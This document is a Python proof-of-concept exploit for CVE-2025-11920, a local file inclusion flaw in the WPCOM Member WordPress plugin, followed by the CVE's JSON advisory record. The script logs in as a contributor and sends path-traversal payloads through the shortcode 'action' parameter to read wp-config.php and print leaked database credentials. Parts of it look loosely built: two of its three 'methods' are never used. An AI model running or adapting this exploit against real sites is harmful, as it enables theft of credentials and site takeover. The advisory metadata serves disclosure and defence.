CVE-2025-11920

# CVE-2025-11920 PoC - WPCOM Member LFI # Requirements: Contributor-level WordPress account # # Read wp-config.php import requests target_url = "http://target-wordpress-site.com/" username = "attacker" password = "attacker_password" # Login to WordPress session = requests.Session() login_url = target_url + "wp-login.php" login_data = { "log": username, "pwd": password, "wp-submit": "Log In" } session.post(login_url, data=login_data) # Exploit LFI via shortcode action parameter # Method 1: Direct file inclusion via shortcode exploit_url = target_url params = { "shortcode": "wpcom_member", "action": "../../../../wp-config.php" # Path traversal to read config } # Method 2: Using the vulnerable shortcode directly in post content malicious_shortcode = """ [wpcom_member action="../../../../wp-config.php"] """ # Method 3: Direct request exploitation # The vulnerable code is in includes/class-member.php # Access via: ?action=../../../../wp-config.php print("[*] CVE-2025-11920 - WPCOM Member LFI PoC") print("[*] Target:", target_url) print("[*] Exploiting via action parameter in shortcode...") # Send exploit request response = session.get(target_url, params=params) if "DB_NAME" in response.text or "define" in response.text: print("[+] SUCCESS: Config file contents leaked!") print(response.text[:500]) else: print("[-] Exploitation failed or file not found")

{"cve": {"id": "CVE-2025-11920", "sourceIdentifier": "[email protected]", "published": "2025-11-01T02:15:33.037", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WPCOM Member plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.7.14 via the action parameter in one of its shortcodes. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wpcom-member/tags/1.7.13/includes/class-member.php#L1119", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wpcom-member/tags/1.7.13/includes/class-member.php#L1171", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wpcom-member/tags/1.7.13/includes/class-member.php#L374", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3385562/wpcom-member/trunk", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/43b04825-d1c6-4e2a-9035-1f4fbfe14818?source=cve", "source": "[email protected]"}]}}